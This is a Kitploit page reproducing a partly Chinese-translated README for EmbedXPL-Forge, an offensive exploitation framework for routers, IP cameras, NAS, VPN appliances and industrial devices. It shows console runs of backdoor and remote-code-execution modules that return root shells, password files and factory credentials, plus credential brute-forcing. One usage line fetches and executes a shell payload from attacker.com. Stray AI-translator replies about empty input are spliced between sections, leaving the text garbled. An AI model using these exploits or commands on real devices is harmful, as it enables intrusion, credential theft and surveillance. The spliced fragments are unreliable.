exf > use exploits/routers/seagate/seagate_nas_php_backdoor exf (Seagate Ghost PHP) > set target 192.168.1.100 exf (Seagate Ghost PHP) > set cmd "id; uname -a" exf (Seagate Ghost PHP) > run [*] Sending command via Ghost PHP backdoor: 'id; uname -a' [+] RCE successful — output: uid=0(root) gid=0(root) groups=0(root) Linux NAS 3.10.14 #1 SMP armv7l

Alpha Networks / ZTE — web_shell_cmd.gch backdoor

exf > use exploits/routers/alpha_networks/web_shell_cmd_rce exf (Alpha Networks web_shell_cmd RCE) > set target 192.168.1.1 exf (Alpha Networks web_shell_cmd RCE) > set cmd "cat /etc/passwd" exf (Alpha Networks web_shell_cmd RCE) > run [*] Sending command to /web_shell_cmd.gch: 'cat /etc/passwd' [+] Response from backdoor shell: root❌0:0:root:/root:/bin/sh ...

RuggedCom — factory backdoor password generator (FD 2012/Apr/277)

exf > use exploits/routers/ruggedcom/ruggedcom_factory_password exf (RuggedCom Factory Password) > set target 192.168.1.1 exf (RuggedCom Factory Password) > set serial RA000000 exf (RuggedCom Factory Password) > run [+] Serial Number : RA000000 [+] Backdoor user : factory [+] Backdoor pass : 7f3d9a2b

Alcatel-Lucent OmniPCX Enterprise — masterCGI RCE

exf > use exploits/routers/alcatel_lucent/omnipcx_masterCGI_rce exf (OmniPCX RCE) > set target 192.168.1.10 exf (OmniPCX RCE) > set cmd "id" exf (OmniPCX RCE) > run [*] Injecting command: 'id' via /cgi-bin/masterCGI?ping=127.0.0.1&user=;id; [+] Response (command output may be embedded): uid=0(root) ...

TRENDnet camera — unauthenticated MJPEG live stream

exf > use exploits/routers/trendnet/camera_mjpeg_unauth exf (TRENDnet MJPEG) > set target 192.168.1.50 exf (TRENDnet MJPEG) > run [+] LIVE STREAM accessible (no auth): /anony/mjpg.cgi [+] Stream URL: http://192.168.1.50:80/anony/mjpg.cgi

Netgear WG602 — hardcoded backdoor credentials

exf > use exploits/routers/netgear/wg602_superman_backdoor exf (WG602 Backdoor) > set target 192.168.1.1 exf (WG602 Backdoor) > run [+] Backdoor login SUCCESS: super:5777364 [*] Admin panel: http://192.168.1.1:80/

root@kitploit:~
**全部 27 个新增厂商/模块:**
`alcatel_lucent` · `alpha_networks` · `astoria` · `binatone` · `ddwrt` · `easybox` · `ee` · `freebox` · `mifi` · `motorola` · `observa` · `ruggedcom` · `seagate` · `sitecom` · `starbridge` · `ubee` · `unicorn` · `utstarcom` · `zoom` · 以及 belkin、netgear、trendnet 的补缺。


## 模块结构```
embedxpl/
├── core/
│   ├── rtsp/          # RTSP camera engine
│   │   ├── client.py  # Raw socket RTSP client (OPTIONS/DESCRIBE/auth/TLS/HTTP-tunnel)
│   │   ├── attacker.py# 5-phase attack pipeline (route→auth→creds→validate→re-attack)
│   │   ├── scanner.py # Network discovery (nmap/masscan/direct), CIDR/range expansion
│   │   └── models.py  # RTSPStream dataclass, AuthType enum
│   └── poly/
│       ├── compiler.py# CCompiler — runtime C/C++ compilation (gcc/clang/mingw/cross)
│       └── runner.py  # PolyRunner — Ruby/Node/PHP/Bash/Perl + Metasploit + ExploitDB
├── modules/
│   ├── creds/             # Credential testing (FTP, SSH, Telnet, HTTP, SNMP)
│   ├── exploits/
│   │   ├── cameras/       # IP camera exploits by vendor
│   │   │   ├── multi/     # Multi-vendor (RTSP attack engine, P2P, ONVIF)
│   │   │   ├── hikvision/ # Hikvision (CVE-2021-36260, CVE-2017-7921, ...)
│   │   │   ├── dahua/     # Dahua + OEMs (CVE-2021-33044, CVE-2020-25078, ...)
│   │   │   ├── axis/      # Axis (CVE-2018-10660, ...)
│   │   │   ├── reolink/   # Reolink (CVE-2021-40655, CVE-2022-30600)
│   │   │   ├── amcrest/   # Amcrest (CVE-2019-3950)
│   │   │   ├── uniview/   # Uniview UNV (CVE-2024-37630)
│   │   │   ├── tapo/      # TP-Link Tapo (CVE-2021-4045)
│   │   │   ├── annke/     # ANNKE DVR/NVR (CVE-2021-32941)
│   │   │   ├── swann/     # Swann DVR/NVR (default creds + RTSP)
│   │   │   └── edimax/    # Edimax IC-7100 (CVE-2025-1316, CISA KEV)
│   │   ├── firmware/      # Firmware flash bypass (NETGEAR, TP-Link, D-Link, ASUS)
│   │   ├── nas/           # NAS exploits (QNAP, D-Link NAS, Zyxel)
│   │   ├── routers/       # Router exploits by vendor (85 vendor folders — see full list below)
│   │   ├── vpn/           # VPN/firewall appliances (Ivanti, Fortinet, SonicWall)
│   │   ├── switches/      # Switch exploits (Cisco, D-Link, NETGEAR)
│   │   └── soho_edge/     # SOHO edge device exploits
│   ├── scanners/          # Network scanning and AutoPwn
│   ├── payloads/          # Reverse/bind shells (multi-arch)
│   ├── encoders/          # Payload encoding (Base64, Hex)
│   └── generic/           # CVE lookup, SNMP, UPnP, SSDP, wordlist tools
├── nse/                   # NSE script manager (Python)
│   ├── manager.py         # NSEManager class — install/uninstall/list/run
│   └── __main__.py        # CLI: python -m embedxpl.nse
├── resources/
│   └── rtsp/
│       ├── routes.txt      # 195+ RTSP stream paths
│       └── credentials.json# 80+ default username:password pairs
└── data/
    └── oui.txt             # IEEE OUI database for MAC-to-vendor lookup

nse/                        # Nmap NSE Lua scripts (pip install embedxpl[nse])
├── embedxpl-rtsp-discover.nse
├── embedxpl-camera-identify.nse
├── embedxpl-hikvision-vuln.nse
├── embedxpl-dahua-vuln.nse
├── embedxpl-rtsp-creds.nse
├── embedxpl-iot-cve-check.nse
└── embedxpl-camera-snapshot.nse

扩展模块覆盖范围

本节记录了 ISP 设备模块、后门/出厂密码漏洞利用、RTSP 客户端框架、OSINT 工具以及专用安全模块。


ISP 设备安全模块

针对互联网服务提供商普遍部署的 ISP 下发 CPE 和 IP 摄像头的漏洞利用与扫描器(基于 Sercomm 的 ONT、GPON CPE 以及 ISP 品牌设备)。

使用示例:```bash

ZTE ZXHN H298A Credential Dump

embedxpl use routers/zte/zxhn_h298a_cred_dump_cve_2026_34474 embedxpl (ZXHNCred) > set rhost 192.168.1.1 embedxpl (ZXHNCred) > run

Expected output (vulnerable device):

[+] Connected to 192.168.1.1:80 [+] Sending ETHCheat request: GET /getpage.lua?pid=1000&ETHCheat=1 [!] VULNERABLE: Credentials exposed Admin Password: admin123 WLAN PSK: MyWifiPass SSID: ZTE_Router_ABC

Sample output (not vulnerable):

[-] No credential fields found in response [-] Target may be patched or different firmware

root@kitploit:~
I'll analyze this request carefully. The user is asking me to translate "chunk 91 of 107" of a Kitploit tool README from English to Chinese. However, looking at the actual content provided, the INPUT section is empty — there's no actual Markdown content to translate.

The message contains extensive instructions about how to translate, but the actual source text that should appear after "INPUT:" is missing. There is nothing to translate.

I should not fabricate content, invent a README chunk, or produce a translation of text that wasn't provided. Doing so would violate the core instruction to translate ONLY the exact text provided.

Since there is no source content, the correct response is to indicate that no content was provided. I cannot translate an empty input, and I must not generate placeholder or hallucinated content.

The appropriate response is to note that the input is empty.```bash
# Intelbras IWR LuCI RPC RCE
embedxpl use routers/intelbras/iwr_luci_rpc_rce
embedxpl (IWRLuci) > set rhost 192.168.0.1
embedxpl (IWRLuci) > set cmd "id"
embedxpl (IWRLuci) > run

# Expected output:
[+] LuCI RPC endpoint found at /cgi-bin/luci/rpc/sys
[+] RCE via sys.exec: uid=0(root) gid=0(root)

I'll analyze the content and provide the translation. However, I notice that the actual content to translate was not included in your message — only the instructions and the "INPUT:" label appear, with no source text following it.

Please provide the actual Markdown content (chunk 93 of 107) that you'd like me to translate from English to Chinese.```bash

Brazilian ISP multi-vendor scanner

embedxpl use scanners/specialized/br_isp_scanner embedxpl (BRISPScan) > set target 192.168.0.0/24 embedxpl (BRISPScan) > run

root@kitploit:~
**注意:** CVE-2026-34474 影响 ZTE ZXHN H298A 1.1 和 H108N 2.6。无需身份验证。
**法律声明:** 仅可在您拥有或已获得书面授权测试的设备上使用。

---

### 遗留路由器后门与出厂密码模块

以 EmbedXPL-Forge 模块格式实现的经典路由器后门与出厂密码漏洞利用。

| 设备 | CVE / 参考 | 模块路径 | 攻击类型 |
|--------|----------------|-------------|-------------|
| Cobham Aviator 700 SATCOM | CVE-2014-2943 | `exploits/specialized/vsat/cobham_aviator_admin_reset_cve_2014_2943` | 管理员密码重置(未认证) |
| Huawei HG8245H | - | `osint/keygen/huawei_hg8245_wpa_keygen` | WPA 默认密钥生成器 |
| Alcatel-Lucent OmniPCX Enterprise | - | `exploits/voip/alcatel_lucent/omnipcx_enterprise_mastercgi_rce` | masterCGI 未认证 RCE |
| Linksys E-Series (The Moon) | EDB-31683 | `exploits/routers/linksys/eseries_themoon_rce_tmunblock` | tmUnblock.cgi RCE |
| NETGEAR DGN2200 | EDB-24665 | `exploits/routers/netgear/dgn2200_open_telnetd_rce` | open-telnetd 未认证 RCE |
| Siemens FlexiISN | - | `exploits/routers/siemens/flexiisn_auth_bypass` | 身份验证绕过 |
| Thomson BTHomeHub | - | `exploits/routers/thomson/bthomehub_voice_hijack` | VoIP 配置劫持 |
| AT&T 2Wire Gateway | - | `exploits/routers/two_wire/atandt_gateway_crlf_dos` | CRLF 注入 / DoS |

**使用示例:**```bash
# Cobham Aviator admin reset (VSAT / Satellite terminal)
embedxpl use specialized/vsat/cobham_aviator_admin_reset_cve_2014_2943
embedxpl (CobhamReset) > set rhost 192.168.1.1
embedxpl (CobhamReset) > run

# Expected output:
[+] Connected to Cobham Aviator 700 interface
[+] Sending unauthenticated admin reset request
[!] VULNERABLE: Admin password reset to default

# Linksys eSeries The Moon RCE
embedxpl use routers/linksys/eseries_themoon_rce_tmunblock
embedxpl (TheMoon) > set rhost 192.168.1.1
embedxpl (TheMoon) > set cmd "busybox wget http://attacker.com/shell -O /tmp/sh && chmod +x /tmp/sh && /tmp/sh"
embedxpl (TheMoon) > run

# Huawei HG8245H WPA keygen
embedxpl use osint/keygen/huawei_hg8245_wpa_keygen
embedxpl (HuaweiKeygen) > set ssid "HG8245H-ABCDEF"
embedxpl (HuaweiKeygen) > run
# Output: [+] Predicted WPA key: xA7z3k9P

注意: Moon 蠕虫(Linksys E 系列 CVE)在固件 < 2.0.08 上无需认证即可利用 tmUnblock.cgi。 法律: 仅可在您拥有或已获得书面授权测试的设备上使用。


RTSP 客户端框架

一个纯 Python 实现的 RFC 2326 RTSP/1.0 客户端库,作为所有 RTSP 摄像头攻击模块的基础。

模块: network/rtsp/rtsp_client.py - RTSPClient 类

功能:

  • OPTIONS、DESCRIBE、SETUP、PLAY、TEARDOWN 方法
  • Basic 和 Digest 认证(RFC 2617)
  • SDP 会话描述解析
  • 自动重连和套接字超时管理
  • 上下文管理器支持(with RTSPClient(...) as client)

使用示例:```bash

Direct Python API usage

python3 -c " from embedxpl.modules.network.rtsp.rtsp_client import RTSPClient with RTSPClient('192.168.1.10', 554, timeout=5) as client: resp = client.describe('/live/ch0') if resp.status_code == 200: sdp = client.parse_sdp(resp.body) print(f'Streams: {[s.media_type for s in sdp.streams]}') "

root@kitploit:~
I don't see any content to translate in your message. The "INPUT:" section is empty — no Markdown text was included.

Please paste the actual chunk 99 content you'd like translated from English to Chinese, and I'll return only the translated Markdown, preserving all structure, code, paths, URLs, and identifiers exactly as required.```bash
# RTSP credential brute force (uses RTSPClient internally)
embedxpl use network/rtsp/rtsp_cred_brute
embedxpl (RTSPBrute) > set rhost 192.168.1.10
embedxpl (RTSPBrute) > set rport 554
embedxpl (RTSPBrute) > set path /live/ch0
embedxpl (RTSPBrute) > run

# Expected output:
[+] Trying admin:admin ... 401 Unauthorized
[+] Trying admin:12345 ... 200 OK
[!] VALID: admin:12345

要求: Python 3.8+,无外部依赖。


FCC-ID 查询模块

OSINT 模块,用于查询 FCC 设备授权数据库,从硬件标签上的 FCC ID 代码中获取设备详细信息。

模块: osint/fcc_id_lookup.py

使用示例:```bash embedxpl use osint/fcc_id_lookup embedxpl (FCCLookup) > set fcc_id "PD5-WNR3500U" embedxpl (FCCLookup) > run

Expected output:

[+] FCC ID: PD5-WNR3500U Grantee: NETGEAR Inc. Product: WNR3500U Wireless-N Gigabit Router Frequency: 2.4GHz / 5GHz Authorization: OET-65C (mobile device) Test Lab: SGS Grant Date: 2009-11-18 Internal Photos: [URL] External Photos: [URL] Test Reports: [URL]

root@kitploit:~
**提示:**
- FCC ID 印在设备标签上(格式:`GRANTEE_CODE-PRODUCT_CODE`)
- 用于识别 OEM 硬件、固件基础或供应链
- 结合 `osint/github_recon` 查找该设备的公开固件仓库

**要求:** 互联网访问、`requests` 库。

---

### 摄像头 URL 生成器

根据厂商、型号和固件版本,使用 iSpy 摄像头数据库格式生成已知的摄像头流 URL。

**模块:** `osint/camera_url_generator.py`

**使用示例:**```bash
embedxpl use osint/camera_url_generator
embedxpl (CameraURL) > set vendor "hikvision"
embedxpl (CameraURL) > set model "DS-2CD2143G2"
embedxpl (CameraURL) > run

# Expected output:
[+] Known stream URLs for Hikvision DS-2CD2143G2:
    [1] rtsp://<ip>:554/Streaming/Channels/101
    [2] rtsp://<ip>:554/Streaming/Channels/102
    [3] rtsp://<ip>:554/h264/ch1/main/av_stream
    [4] http://<ip>/ISAPI/Streaming/channels/1/picture
    [5] http://<ip>/onvif/device_service

# Generate wordlist for RTSP brute force
embedxpl (CameraURL) > set output_file /tmp/hikvision_routes.txt
embedxpl (CameraURL) > run

提示:

  • 与 network/rtsp/rtsp_route_brute 结合使用以枚举实时流
  • 支持来自 iSpy 开放摄像头数据库的 300+ 摄像头厂商
  • 使用 set all_vendors true 导出所有已知 URL

交通执法安全模块

针对交通执法基础设施(收费 RSU、雷达系统、ANPR 摄像头)的模块。

Kapsch TrafficCom RSU EFI Shell (CVE-2025-25734)

模块: exploits/specialized/traffic_enforcement/kapsch_rsu_efi_shell_cve_2025_25734

漏洞: 用于电子收费的 Kapsch 路侧单元(RSU)缺乏 UEFI 安全启动强制和 BIOS 密码保护,允许物理攻击者进入 EFI 交互式 shell 并访问完整文件系统。

影响: 配置提取、TLS 私钥窃取、植入安装、收费执法绕过。

使用示例:```bash

Network reachability check (management interface detection)

embedxpl use specialized/traffic_enforcement/kapsch_rsu_efi_shell_cve_2025_25734 embedxpl (KapschRSU) > set rhost 10.0.0.50 embedxpl (KapschRSU) > check

Expected output (management interface exposed):

[+] Kapsch RSU management interface detected on 10.0.0.50:80 [!] Banner indicator: 'TrafficCom RSU' found [*] NOTE: Full exploitation requires physical on-site access

Assessment report

embedxpl (KapschRSU) > run

Outputs: attack steps, mitigations checklist, risk level

root@kitploit:~
**物理利用步骤:**
1. 打开 RSU 外壳(防篡改螺丝)
2. 将 USB 键盘和显示器连接到 RSU 主板
3. 重新通电 - 在 POST 期间按 ESC/DEL/F2
4. 导航:Boot Manager -> EFI Internal Shell
5. 访问文件系统:`fs0:\efi\config\` 以提取配置

**要求:** 对 RSU 硬件的物理访问(显示器 + USB 键盘),或对管理界面的网络访问以进行横幅检测。
**法律:** 未经授权访问收费执法基础设施属于刑事犯罪。仅可在您拥有或获得明确书面授权进行评估的设备上使用。

---

## 框架架构(v3.1.0)

### 组件架构

框架的完整分层视图:CLI 层、核心引擎(编排器、协议客户端、Shell 引擎)、智能层(ML、OUI、CVE 数据库)、质量门禁,以及按类别组织的 2800+ 模块库。

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/63129f66ef4361f16ede4ec2b9379e2efba3843685ddb18c40d8302c0c27d00a/38190b67586381886a6b4fadd441bed66ae0b3a5fe573e650bcb67a032096d54-display-v1.webp" width="960" alt="EmbedXPL-Forge Component Architecture v3.1.0"/>
</p>

### 审计与利用流程

从目标输入到发现、指纹识别、模块选择、利用和报告的端到端数据流。

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/266a4c0b8889e9cd6cdbad9450d3b173190d0bb1f615807ff2d040544cbba45b/774107c9888c0d2a25fbb913c73c6ed3c4a4a43da2782c6bb400a2b1b2421fb6-display-v1.webp" width="960" alt="EmbedXPL-Forge Exploitation Flow v3.1.0"/>
</p>


## 架构与攻击面地图

攻击面地图展示了每个访问向量的模块覆盖范围,采用操作安全图表的风格。
源文件位于 [`docs/diagrams/architecture/`](https://github.com/mrhenrike/embedxpl-forge/blob/master/docs/diagrams/architecture)。

### 模块架构概览

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/77e312b38d78c27f7d1de0276c6f304f343f323b2d0f951c2f9a2a5362c3e54c/add82fa1cc0dc85f3f6b414270fdc3e457d72b05d31ec9013ae5a08f8427cf52-display-v1.webp" width="900" alt="EmbedXPL-Forge Architecture Overview"/>
</p>

### APT 组织攻击链

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/e1ab0771072292d7cfd319a886323c1ee5630374de9b7aa88652badb233f10db/540b3fc97ec030a32c27f896ee3e03fa11e349dd9ba8fdc10905618932d9e9ce-display-v1.webp" width="900" alt="APT Group Attack Chains"/>
</p>

### SOHO 路由器攻击面

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/5254908f6c1a366a0fb268b89fe1c3260a2d67d2fad0e3380b9d846af5e245ca/e15dbde66c8adc6a223f2ef570c2b202a8cd58b5f69f924399be4a32debf3511-display-v1.webp" width="900" alt="SOHO Router Attack Surface"/>
</p>

### TP-Link 攻击面(APT28/GRU 行动)

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/93f5be2a074ef3b827832e532658e6ea0ada911f9ed0433a4986355ca34e11bf/436ac5ee2ad503629993f8cb04ca563f0d36b2409664abc74705aee9b5d8dbaa-display-v1.webp" width="900" alt="TP-Link APT28 Attack Surface"/>
</p>

### MikroTik RouterOS 攻击面

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/b36a43e11581966fcf539289c66b6694ab23910a52a9c0ed031f18402d366bc4/910bb2d9cd7b55834ebfb6dfd6b02121f3242bf8140435afb2ab28fc196b1faf-display-v1.webp" width="900" alt="MikroTik Attack Surface"/>
</p>

### GPON ONT 攻击面(Huawei EG8145)

<p align="center">
  <img src="https://assets.kitploit.com/production/public/readmes/56270/31f8afeec116e1cfea33753c26b01905351cc1c2a03bc46175f155dbe5e06dfe/34dc8af47fd53c639ed089f6797407be884617726c885c5faad96e7a22b6a078-display-v1.webp" width="900" alt="GPON ONT Attack Surface"/>
</p>

## 要求

- Python 3.8+
- 可选:`nmap`(二进制文件)用于增强网络发现和 NSE 脚本
- 可选:`masscan` 用于高速 RTSP 发现
- 可选:`gcc`/`clang` 用于 PolyExploit C/C++ 运行时编译
- 可选:`msfconsole` 用于通过 PolyRunner 集成 Metasploit

**Python 依赖(自动安装):**
`requests`、`paramiko`、`pysnmp`、`pycryptodome`、`scapy`、`colorama`、`rich`、`python-nmap`、`aiohttp`

**NSE 附加组件(`pip install "embedxpl[nse]"`):**
`python-nmap`(已包含在核心中)

完整列表:[`requirements.txt`](https://github.com/mrhenrike/embedxpl-forge/blob/master/requirements.txt)

## 法律免责声明

EmbedXPL-Forge 仅供授权的安全测试和研究使用。请仅在您拥有或获得明确书面许可进行测试的系统上使用此工具。未经授权访问计算机系统是违法的。作者对滥用不承担任何责任。

## 许可证

BSD 许可证 — 详情请参阅 [LICENSE](https://github.com/mrhenrike/embedxpl-forge/blob/master/LICENSE)。
---

## 联系方式

**支持 / 一般咨询:** [email protected]
**安全问题:** [SECURITY.md](https://github.com/mrhenrike/embedxpl-forge/blob/master/SECURITY.md)

---

### André Henrique

| | |
|---|---|
| GitHub | [@mrhenrike](https://github.com/mrhenrike) |
| X / Twitter | [@mrhenrike](https://x.com/mrhenrike) |
| LinkedIn | [mrhenrike](https://www.linkedin.com/in/mrhenrike/) |

### União Geek

| | |
|---|---|
| 网站 | [uniaogeek.com.br](https://uniaogeek.com.br/) |
| 博客 | [uniaogeek.com.br/blog](https://uniaogeek.com.br/blog/) |
| GitHub | [Uniao-Geek](https://github.com/Uniao-Geek) |
| Instagram | [@uniaogeek](https://www.instagram.com/uniaogeek/) |

---

**许可证:** BSD-3-Clause License - Copyright (c) 2026 União Geek
**创建者:** André Henrique ([@mrhenrike](https://github.com/mrhenrike)) | [União Geek](https://uniaogeek.com.br/)

[Leia em Português](https://github.com/mrhenrike/embedxpl-forge/blob/master/README.pt-BR.md) - [Command coverage](https://github.com/mrhenrike/embedxpl-forge/blob/master/docs/commands.md) - [Wiki](../../wiki)
下载工具
类型覆盖范围描述
路由器 / GPON ONT / CPE580+ 个模块SOHO 路由器、企业网关、GPON CPE/ONT(主要焦点)
IP 摄像头 / NVR / DVR60+ 个模块Hikvision、Dahua、Axis、Reolink、Amcrest、Uniview、Tapo、Swann、ANNKE、Edimax、Intelbras、Grandstream、Foscam、Xiongmai OEM、MVPower 以及 20+ 个其他品牌
打印机 / 多功能一体机185+ 个模块HP、Canon、Lexmark、Xerox、Ricoh、Brother、Epson、Kyocera、Samsung;IPP/PJL/LPD/WSD/CUPS 链
NAS(网络存储)20+ 个模块QNAP、Synology、D-Link NAS、Zyxel NAS
VPN / 防火墙设备 / NGFW202 个模块Palo Alto、Fortinet、Cisco ASA/FTD/FMC、Check Point、Juniper、SonicWall、Sophos、WatchGuard、Zyxel、F5 BIG-IP、Citrix/NetScaler、Ivanti、Pulse Secure、pfSense、OPNsense、Barracuda、Imperva、MikroTik、Huawei USG、Stormshield、Hillstone、Sangfor、H3C、Radware、Symantec ProxySG、Trend Micro TippingPoint、Trellix、Arista EOS、OpenVPN AS、Phoenix Contact mGuard、Siemens SCALANCE、Moxa EDR、VyOS、IPFire、Kerio、Cisco Meraki、Array Networks + OT/ICS 协议绕过模块
L2/L3 交换机3 个模块管理型交换机(Cisco、D-Link、NETGEAR)
SOHO 边缘设备9 个模块旅行路由器、NAS、无线 AP
ICS / OT / 工业35+ 个模块PLC、SCADA、Modbus、S7comm、EtherNet/IP、Universal Robots PolyScope 5
智能家居 / 海事10+ 个模块eNet SMART HOME、OpenRemote IoT、Metis 海事 WIC/DFS
嵌入式操作系统25+ 个模块RIOT OS、OpenWrt、VxWorks、QNX、wolfSSL 设备、Tuya Arduino SDK
命令描述
use <module>选择一个模块
show options显示可配置选项
show info显示模块元数据和参考信息
show devices列出支持的设备类型
set <option> <value>配置一个选项
check验证目标是否存在漏洞
run执行模块
search <term>按关键词搜索模块
discover [subnet] [--timing T0-T5] [--fresh]扫描子网、指纹识别目标、推荐模块
sessions list|show|delete|export|purge管理每台主机的持久化扫描历史
apt列出具有可复现攻击链的 APT 组织
apt show <group>查看攻击链详情(MITRE ATT&CK、CVE、模块)
apt search <device|CVE>查找针对某设备或 CVE 的 APT 组织
apt run <group> [#]执行 APT 攻击链(全部或特定攻击)
配置延迟使用场景
T0偏执 — 300sIDS 规避
T1隐蔽 — 15s静默审计
T2礼貌 — 2s影响最小
T3正常 — 0.5s默认
T4激进 — 0.1s快速局域网扫描
T5疯狂 — 0s仅限 CTF / 实验室
模式端口类 / 方法
rtsp554RTSPClient(host, port)
rtsps443/8443RTSPClient(host, port, use_tls=True)
http80/8080RTSPClient(host, port, tunnel_http=True)
https443/8443RTSPClient(host, port, use_tls=True, tunnel_http=True)
autoanyRTSPClient.from_scheme(host, port, "http")
设备CVE模块路径攻击类型
TP-Link TL-SC3171 / SC4171 / SC4171GCVE-2013-2573exploits/cameras/tplink/tl_sc_series_cmd_inject_cve_2013_2573命令注入(未认证)
TP-Link TL-SC3171 / SC3130CVE-2013-2581exploits/cameras/tplink/tl_sc_series_unauth_firmware_upload_cve_2013_2581未认证固件上传
D-Link DCS-932LCVE-2026-36983exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983光传感器 RCE
D-Link DCS-932LCVE-2025-5573exploits/cameras/dlink/dcs_932l_admin_cmd_inject_cve_2025_5573管理面板命令注入
D-Link DCS-933LCVE-2026-2218exploits/cameras/dlink/dcs_933l_admin_cmd_inject_cve_2026_2218管理面板命令注入
ZTE ZXHN H267N / H268NCVE-2026-34473exploits/routers/zte/zxhn_h267n_h268n_dos_cve_2026_34473拒绝服务
ZTE ZXHN H298A / H108NCVE-2026-34474exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474凭据转储(ETHCheat)
Intelbras IWR 路由器-exploits/routers/intelbras/iwr_luci_rpc_rceLuCI RPC 未认证 RCE
多厂商 BR ISP 扫描器-scanners/specialized/br_isp_scanner主动发现 + 漏洞检查